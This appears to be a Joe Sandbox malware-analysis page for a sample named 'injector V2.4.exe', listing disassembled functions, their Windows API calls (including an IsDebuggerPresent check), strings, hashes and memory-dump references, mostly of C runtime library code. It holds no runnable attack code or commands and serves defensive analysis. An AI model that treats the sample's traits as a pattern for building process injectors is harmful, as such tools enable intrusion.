Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
Instruction ID: 43e1885cc9900822d50aae56e1f10bc73f010811f840e38796b0312f8d1d34ac
Opcode Fuzzy Hash: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
Instruction Fuzzy Hash: 6AF09836540215BFCF221FD5AC09B993F6AEB087A6F054190FE1896230DF7288A0EB90

Function 00B5225C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B52265

Strings

csm, xrefs: 00B522F8
csm, xrefs: 00B52287

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
Instruction ID: 40a31173d2aec64bc69540581e6911f60949990bdecf3b5e977b2c018a296dfd
Opcode Fuzzy Hash: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
Instruction Fuzzy Hash: 2231CF36502205DFCF228F50CC40B6E7BA5FF0A316F1841DAFC584A121C336C9AADB85

Analysis Process: injector V2.4.exePID: 3720, Parent PID: 6348COMMON

Non-executed Functions

Function 00B4F731 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
Instruction ID: 26519f787e9162f85b47a5498e3652c7fc16b181adb8d4893e790f1473ee2040
Opcode Fuzzy Hash: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
Instruction Fuzzy Hash: F971C47190515AAFDF20AF38DC89BBABBF9EB05304F1441E9E449A7211DA358F85AF10

Function 00B496AF Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B496BB
IsDebuggerPresent.KERNEL32 ref: 00B49787
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B497A7
UnhandledExceptionFilter.KERNEL32(?), ref: 00B497B1

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
Instruction ID: ca03c3964246066d95ffd6abfea1d31a0c15c33ffc1fe09476ad374cbbd18999
Opcode Fuzzy Hash: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
Instruction Fuzzy Hash: 8C31E4B59453189BDB10EFA4D9897CDBBF8AF18300F1041EAE40DAB250EB719B859F45

Function 00B525C3 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B526E2
___TypeMatch.LIBVCRUNTIME ref: 00B527F0
CatchIt.LIBVCRUNTIME ref: 00B52841
_UnwindNestedFrames.LIBCMT ref: 00B52942
CallUnexpected.LIBVCRUNTIME ref: 00B5295D

Strings

csm, xrefs: 00B5266D
csm, xrefs: 00B52600
csm, xrefs: 00B52719

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
Instruction ID: 45a4c17138b49329cb54cc857b4d2e34239410fffe1e70bf8a685df44acc8902
Opcode Fuzzy Hash: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
Instruction Fuzzy Hash: 2FB138318022099FCF19DFA4C881AAEBBF5FF19316F1441E9EC116B212D731EA59DB91

Function 00B53F46 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,00B53F31,?,?,?,?,?,?,?,?,?,?), ref: 00B53FEC
__alloca_probe_16.LIBCMT ref: 00B540A7
__alloca_probe_16.LIBCMT ref: 00B54136
__freea.LIBCMT ref: 00B54181
__freea.LIBCMT ref: 00B54187
__freea.LIBCMT ref: 00B541BD
__freea.LIBCMT ref: 00B541C3
__freea.LIBCMT ref: 00B541D3

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
Instruction ID: ef56e744ecc62a0cdb393fb7d56e5de3f10b317e78d9dbf0201db979e886ab86
Opcode Fuzzy Hash: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
Instruction Fuzzy Hash: B47101729007056ADF219F648C81BAE7BFAEF5531AF2800D9ED14B7281D731DDC887A1

Function 00B448F0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 243COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B44997

Strings

(^Hx, xrefs: 00B44A8B
(^Hx, xrefs: 00B44AAC
(^Hx, xrefs: 00B44AB7

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: ___std_exception_copy
String ID: (^Hx$(^Hx$(^Hx
API String ID: 2659868963-1348055467
Opcode ID: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
Instruction ID: 6f58e69f9acafb190962dc9b945ee23934eec273c76a039be9a21e7f5379995f
Opcode Fuzzy Hash: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
Instruction Fuzzy Hash: 24811B362043005F8B24DA29A9C833E72D1E798321F7C8AD5E5A1CB7E1EF75CA54B742

Function 00B49E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B49E77
___except_validate_context_record.LIBVCRUNTIME ref: 00B49E7F
_ValidateLocalCookies.LIBCMT ref: 00B49F08
__IsNonwritableInCurrentImage.LIBCMT ref: 00B49F33
_ValidateLocalCookies.LIBCMT ref: 00B49F88

Strings

csm, xrefs: 00B49F1D

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
Instruction ID: c778cff382c8a130e6a90332a1503ec3ce4e834225436c6d2fe64578e38955a9
Opcode Fuzzy Hash: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
Instruction Fuzzy Hash: 0041A334A002199BCF10DF68D881A9FBBE5EF45324F1481D5E8189B392E731EF19DB91

Function 00B4C89A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00B4C9A9,?,00B2782F,00000000,00000000), ref: 00B4C95B

Strings

ext-ms-, xrefs: 00B4C905
api-ms-, xrefs: 00B4C8F1

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
Instruction ID: e78ad31aadc7077bf82e3991a8323a17f6b405207be3a1e0dd368f393e601a96
Opcode Fuzzy Hash: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
Instruction Fuzzy Hash: B021D531A06311BBD7629F68DC80B5A3FE9EB45BA1F1405E0E815A7291DB30EF00E6D1

Function 00B4C13E Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B4C135,00B49C1D,00B49814), ref: 00B4C14C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4C15A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4C173
SetLastError.KERNEL32(00000000,00B4C135,00B49C1D,00B49814), ref: 00B4C1C5

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8743e1b21195abc100e3127bd03bc75bdcf62cebe8cbbd6cad65db3cd73eee70
Instruction ID: b2520602d1ed2a7e875443044bea62556673610a05484073213e86828acfb73e
Opcode Fuzzy Hash: 8743e1b21195abc100e3127bd03bc75bdcf62cebe8cbbd6cad65db3cd73eee70
Instruction Fuzzy Hash: D701D83210A7116DB66527B56CC5F263FD4CB11F7B72003FAF524660E2EE514D057594

Function 00B3DD00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

eIY, xrefs: 00B3DD98
string too long, xrefs: 00B3DE5A
eIY, xrefs: 00B3DD75
eIY, xrefs: 00B3DDF8

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: string too long$eIY$eIY$eIY
API String ID: 0-1759105153
Opcode ID: 8bfbc5a3a0a90429a666a28c06245bd3debad346119aa750c190e8280aeff039
Instruction ID: d9afd177c426faec93623f18da094c4209e4a4c3d86f08d877b01ec17a471646
Opcode Fuzzy Hash: 8bfbc5a3a0a90429a666a28c06245bd3debad346119aa750c190e8280aeff039
Instruction Fuzzy Hash: 1521562330426197AE280A2CF88522E3AC38AE17B0F3A45EAD4196F256C637CCD59252

Function 00B4A925 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,?,00B563AE,000000FF), ref: 00B4A95A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,00B563AE,000000FF), ref: 00B4A96C
FreeLibrary.KERNEL32(00000000,?,?,?,00B563AE,000000FF), ref: 00B4A98E

Strings

mscoree.dll, xrefs: 00B4A953
CorExitProcess, xrefs: 00B4A964

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
Instruction ID: 24203e575b2ee8810862d8aabf323c60fa59f5a16aed9dcb0b7edf1ccdef18fd
Opcode Fuzzy Hash: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
Instruction Fuzzy Hash: 5301A271950719AFDB128F54DC09BAEBBF8FB44B16F0402A9E811A36E0EB749904CA90

Function 00B50E88 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B50F0D
__alloca_probe_16.LIBCMT ref: 00B50FD6
__freea.LIBCMT ref: 00B5103D

Part of subcall function 00B4EB9B: HeapAlloc.KERNEL32(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD

__freea.LIBCMT ref: 00B51050
__freea.LIBCMT ref: 00B5105D

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
Instruction ID: 1f6971281628d21f245d5bcfc780716d454275995275f21cbc0fd42626e7dee7
Opcode Fuzzy Hash: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
Instruction Fuzzy Hash: 3651E672600256AFDB206F68CC81FBB7BE9EF44712F1908E9FD04D6181EB74DD889660

Function 00B529E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B528EE,?,?,00000000,00000000,00000000,?), ref: 00B52A0D
CatchIt.LIBVCRUNTIME ref: 00B52AF3

Strings

RCC, xrefs: 00B52A27
MOC, xrefs: 00B52A1F

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
Instruction ID: e7116953e758f5c15904211e6723982d2739256a9870b911120c3226cebb4c9b
Opcode Fuzzy Hash: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
Instruction Fuzzy Hash: 9F414671A01209AFDF25CF98C981AAEBBF5FF09305F1880D9FA0467222E3359A55DB50

Function 00B50C22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00B50C2F
GetLastError.KERNEL32 ref: 00B50C39
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00B50C61

Strings

api-ms-, xrefs: 00B50C46

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
Instruction ID: e7ef1ec7c678c422d43911c49b3d9fb70e400363d08cc35714257f308a0f70a9
Opcode Fuzzy Hash: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
Instruction Fuzzy Hash: 3FE01A30680308BAEA212BA5ED46B1A3F9AEB01B42F1040E0FD0CAC0A1EBA299559584

Function 00B5157F Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00B515E2

Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B51834
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B5187A
GetLastError.KERNEL32 ref: 00B5191D

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
Instruction ID: d76d7660a7a8e0b50ab572c5f483a359158408b4c544443337649b5db093b239
Opcode Fuzzy Hash: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
Instruction Fuzzy Hash: D7D16BB5D002489FDB15CFA8D880BEDBBF5EF09311F2849AAE865EB251D730A945CB50

Function 00B523EC Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B524B3
___AdjustPointer.LIBCMT ref: 00B524D6
___AdjustPointer.LIBCMT ref: 00B52572

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
Instruction ID: 011f415e91e5e5b69ac81c9ec62745c7eed27363568d33de7b20805fe90502ee
Opcode Fuzzy Hash: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
Instruction Fuzzy Hash: 3E511372A022029FDB2A8F14E891B7AB7E4FF16312F1444EDED05972A1E731ED49D790

Function 00B4F50E Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F572
__dosmaperr.LIBCMT ref: 00B4F579
GetLastError.KERNEL32(00000000,00B4F8B4,?,?,00000000,?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F5B3
__dosmaperr.LIBCMT ref: 00B4F5BA

Memory Dump Source

Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
Instruction ID: 76521a857f5b0832f7d109ff8ab0f8d3037f6269f7ac3451eb492d8c058b6502
Opcode Fuzzy Hash: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
Instruction Fuzzy Hash: 2321A771600617AFDB10AF658C8197BB7E9FF2436471085B9F86997250DB30EF40ABA1

Function 00B4FAB4 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

